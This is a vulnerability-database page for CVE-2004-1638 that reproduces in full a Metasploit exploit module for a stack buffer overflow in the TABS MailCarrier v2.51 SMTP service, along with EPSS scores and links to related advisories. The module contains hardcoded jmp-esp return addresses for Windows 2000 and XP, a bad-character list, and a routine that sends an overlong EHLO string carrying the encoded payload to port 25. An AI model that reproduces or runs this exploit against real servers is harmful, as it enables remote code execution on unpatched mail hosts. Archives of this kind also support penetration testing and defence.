Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormPatrick WebsterPACKETSTORM:83004
HistoryNov 26, 2009 - 12:00 a.m.

TABS MailCarrier v2.51 SMTP EHLO Overflow

2009-11-2600:00:00
Patrick Webster
packetstormsecurity.com
157

0.511 Medium

EPSS

Percentile

97.6%

JSON
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/   
##  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info = {})   
super(update_info(info,   
'Name' => 'TABS MailCarrier v2.51 SMTP EHLO Overflow',  
'Description' => %q{  
This module exploits the MailCarrier v2.51 suite SMTP service.  
The stack is overwritten when sending an overly long EHLO command.  
},  
'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ],  
'Arch' => [ ARCH_X86 ],   
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
[ 'CVE', '2004-1638' ],  
[ 'OSVDB', '11174' ],  
[ 'BID', '11535' ],  
[ 'URL', 'http://milw0rm.com/exploits/598' ],  
],   
'Privileged' => true,  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
},  
'Payload' =>  
{   
'Space' => 300,  
'BadChars' => "\x00\x0a\x0d:",  
'StackAdjustment' => -3500,  
},  
'Platform' => ['win'],  
'Targets' =>  
[  
# Patrick - Tested OK 2007/08/05 : w2ksp0, w2ksp4, xpsp0, xpsp2 en.  
[ 'Windows 2000 SP0 - XP SP1 - EN/FR/GR', { 'Ret' => 0x0fa14c63 } ], # jmp esp expsrv.dll w2ksp0 - xpsp1  
[ 'Windows XP SP2 - EN', { 'Ret' => 0x0fa14ccf } ], # jmp esp expsrv.dll xpsp2 en  
],  
'DisclosureDate' => 'Oct 26 2004',  
'DefaultTarget' => 0))  
  
register_options(  
[  
Opt::RPORT(25),  
Opt::LHOST(), # Required for stack offset  
], self.class)  
end  
  
def check   
connect  
banner = sock.get_once(-1,3)  
disconnect  
  
if (banner =~ /ESMTP TABS Mail Server for Windows NT/)  
return Exploit::CheckCode::Appears   
end  
return Exploit::CheckCode::Safe  
end  
  
def exploit  
connect  
  
sploit = "EHLO " + rand_text_alphanumeric(5106 - datastore['LHOST'].length, payload_badchars)  
sploit << [target['Ret']].pack('V') + payload.encoded  
  
sock.put(sploit + "\r\n")  
  
handler  
disconnect  
end  
  
end  
`

Related

cve 1
cvelist 1
nvd 1
openvas 1
nessus 1
cve
cve
CVE-2004-1638
2005-02-20 05:00:00
cvelist
cvelist
CVE-2004-1638
2005-02-20 05:00:00
nvd
nvd
CVE-2004-1638
2004-10-16 04:00:00
openvas
openvas
TABS MailCarrier SMTP Buffer Overflow Vulnerability
2005-11-03 00:00:00
nessus
nessus
MailCarrier < 3.0.1 SMTP EHLO Command Remote Overflow
2004-12-03 00:00:00

0.511 Medium

EPSS

Percentile

97.6%

JSON
Related for PACKETSTORM:83004
cve1cvelist1nvd1openvas1nessus1